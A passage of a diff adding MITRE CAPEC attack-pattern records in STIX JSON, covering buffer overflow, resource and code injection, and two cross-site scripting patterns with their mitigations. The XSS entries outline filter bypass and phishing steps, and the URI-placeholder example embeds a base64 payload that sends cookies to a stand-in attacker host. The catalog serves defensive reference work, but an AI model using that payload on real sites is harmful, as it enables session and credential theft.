", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Ability to control the length of data passed to an active filter." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs.", + "id": "course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b078701a-fc7f-4782-8328-f24692e8b6f9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pre-design: Use a language or compiler that performs automatic bounds checking.", + 
"id": "course-of-action--7bd078cd-9dbf-44a2-9bd8-4f13425b385d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7bd078cd-9dbf-44a2-9bd8-4f13425b385d", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pre-design through Build: Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. 
Unless this provides automatic bounds checking, it is not a complete solution.", + "id": "course-of-action--f57e0c5f-4b65-49c5-a707-502f310762ed", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f57e0c5f-4b65-49c5-a707-502f310762ed", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operational: Use OS-level preventative functionality. 
Not a complete solution.", + "id": "course-of-action--d9bfea83-be0c-47f2-99c5-56b5812d013b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5152f113-a2d4-4665-bec3-a45da5d7b399", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9bfea83-be0c-47f2-99c5-56b5812d013b", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use an abstraction library to abstract away risky APIs. 
Not a complete solution.", + "id": "course-of-action--a8d851ab-8c11-49fb-8bb1-ae0f95175539", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--adcbc9cc-ab6a-4107-bbb0-3c1ad2233710", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a8d851ab-8c11-49fb-8bb1-ae0f95175539", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.", + "external_references": [ + { + "external_id": "CAPEC-240", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/240.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "description": "Resource Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Resource_Injection" + } + ], + "id": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Resource Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + 
"x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4" + ], + "x_capec_prerequisites": [ + "The target application allows the user to both specify the identifier used to access a system resource. Through this permission, the user gains the capability to perform actions on that resource (e.g., overwrite the file)" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all input content that is delivered to client is sanitized against an acceptable content specification.", + "id": "course-of-action--ef62d977-a0fa-4d4d-a3c5-9830fba4f873", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56610af9-7476-40eb-9fe6-53cf9958d96d", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef62d977-a0fa-4d4d-a3c5-9830fba4f873", + "target_ref": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform input validation for all content.", + "id": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-1", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--49b55648-8b51-4e4f-981c-60f90a683b32", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "target_ref": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce regular patching of software.", + "id": "course-of-action--f8d51fc9-bebb-4f00-9ce1-e0bcb3815d42", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6454cc9d-9fac-4495-9887-bfcf65fb0131", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8d51fc9-bebb-4f00-9ce1-e0bcb3815d42", + "target_ref": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-242 : Code Injection\". 
Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-241", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/241.html" + } + ], + "id": "attack-pattern--b8923381-6219-46bf-b05d-3fa706c0d467", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Code Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.", + "external_references": [ + { + "external_id": "CAPEC-242", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/242.html" + }, + { + "external_id": "CWE-94", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html" + }, + { + "description": "Code Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Code_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-612", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.html" + } + ], + "id": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Code Injection", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Confidentiality": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Integrity": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--634aeef0-13a8-449b-afea-332cbc6095bf", + "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_prerequisites": [ + "The target software does not validate user-controlled input such that the execution of a process may be altered by sending code in through legitimate data channels, using no other mechanism." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--a99fa1c3-7798-453a-8c18-1387446a4827", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-242-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f5e3b137-a200-4caa-9f02-88cba0ca4e80", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a99fa1c3-7798-453a-8c18-1387446a4827", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fcbfee88-5388-4fea-b023-06917c8b7cfd", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef62d977-a0fa-4d4d-a3c5-9830fba4f873", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e446d58c-04b2-49cb-a3bd-32a5c4a303b0", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], 
+ "relationship_type": "mitigates", + "source_ref": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b074b90c-807f-4764-ae36-cfc636a4d377", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8d51fc9-bebb-4f00-9ce1-e0bcb3815d42", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts commands to perform cross-site scripting (XSS) actions in HTML attributes. Many filters do not adequately sanitize attributes against the presence of potentially dangerous commands even if they adequately sanitize tags. For example, dangerous expressions could be inserted into a style attribute in an anchor tag, resulting in the execution of malicious code when the resulting page is rendered. 
If a victim is tricked into viewing the rendered page the attack proceeds like a normal XSS attack, possibly resulting in the loss of sensitive cookies or other malicious activities.", + "external_references": [ + { + "external_id": "CAPEC-243", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/243.html" + }, + { + "external_id": "CWE-83", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html" + }, + { + "description": "Jeremiah Grossman, Attribute-Based Cross-Site Scripting", + "external_id": "REF-94", + "source_name": "reference_from_CAPEC", + "url": "http://jeremiahgrossman.blogspot.com/2007/07/attribute-based-cross-site-scripting.html" + } + ], + "id": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XSS Targeting HTML Attributes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for XSS targeting HTML attributes: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various malicious expressions as input, hoping to embed them as HTML attributes.

  2. Techniques
    Inject single and double quotes into URL parameters or other inputs to see if they are filtered out. Also use URL encoding to bypass filters.
    Use single or double quotes to close attribute evaluation and enter a new attribute that contains an expression.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Execute a script using an expression embedded in an HTML attribute, which avoids needing to inject a script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_prerequisites": [ + "The target application must fail to adequately sanitize HTML attributes against the presence of dangerous commands." + ], + "x_capec_resources_required": [ + "The adversary must trick the victim into following a crafted link to a vulnerable server or view a web post where the dangerous commands are executed." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0809c5e1-86fc-4df6-8e5e-50939743e745", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "target_ref": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Normalize, filter and use an allowlist for all input including that which is not expected to have any scripting content.", + "id": "course-of-action--3647060a-91b9-4ee7-bbf8-78c5d4f20adf", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-243-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d8f1ebe4-ac7e-4221-af0e-4f36e5905da9", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3647060a-91b9-4ee7-bbf8-78c5d4f20adf", + "target_ref": 
"attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--efed9086-1bee-4608-a734-9e9b775b744f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7a8e75aa-0acc-4307-99ae-181fbe26a03d", + "target_ref": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits the ability of most browsers to interpret \"data\", \"javascript\" or other URI schemes as client-side executable content placeholders. This attack consists of passing a malicious URI in an anchor tag HREF attribute or any other similar attributes in other HTML tags. Such malicious URI contains, for example, a base64 encoded HTML content with an embedded cross-site scripting payload. 
The attack is executed when the browser interprets the malicious content i.e., for example, when the victim clicks on the malicious link.", + "external_references": [ + { + "external_id": "CAPEC-244", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/244.html" + }, + { + "external_id": "CWE-83", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html" + }, + { + "description": "OWASP Testing Guide (v2), The Open Web Application Security Project (OWASP)", + "external_id": "REF-70", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/index.php/Testing_for_Cross_site_scripting" + }, + { + "description": "Google Cross-Site Scripting HOWTO article, Google", + "external_id": "REF-96", + "source_name": "reference_from_CAPEC", + "url": "https://code.google.com/archive/p/doctype/wikis/ArticleXSSInUrlAttributes.wiki" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-72", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Cross-Site+Scripting" + } + ], + "id": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Targeting URI Placeholders", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + 
"Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n The following payload data:\n text/html;base64,PGh0bWw+PGJvZHk+PHNjcmlwdD52YXIgaW1nID0gbmV3IEltYWdlKCk7IGltZy5zcmMgPSAiaHR0cDovL2F0dGFja2VyLmNvbS9jb29raWVncmFiYmVyPyIrIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5jb29raWVzKTs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==\n represents a base64 encoded HTML and uses the data URI scheme to deliver it to the browser.\n The decoded payload is the following piece of HTML code:\n \n \n \n Web applications that take user controlled inputs and reflect them in URI HTML placeholder without a proper validation are at risk for such an attack.\n An adversary could inject the previous payload that would be placed in a URI placeholder (for example in the anchor tag HREF attribute):\n My Link\n Once the victim clicks on the link, the browser will decode and execute the content from the payload. This will result on the execution of the cross-site scripting attack.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Probe identified potential entry points for reflected XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various payloads formatted as data URI schemes using base to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

  2. Techniques
    Use a list of XSS probe strings using different URI schemes to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier to trace the injected string back to the entry point.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Change a URL parameter to include a malicious payload formatted as a URI scheme, or use the URL returned when the URI scheme was given as input to the web application.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript and allows executable content delivered using a data URI scheme." + ], + "x_capec_resources_required": [ + "Ability to send HTTP request to a web application" + ], + "x_capec_skills_required": { + "Medium": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e01b3e67-6f6d-47fe-a52a-568341eaba2c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize strict type, character, and encoding enforcement.", + "id": "course-of-action--bb7c30e0-981f-4cc9-a85a-920f323e51d3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-244-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b1be8912-a434-4763-a021-096909c3c231", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb7c30e0-981f-4cc9-a85a-920f323e51d3", + "target_ref": 
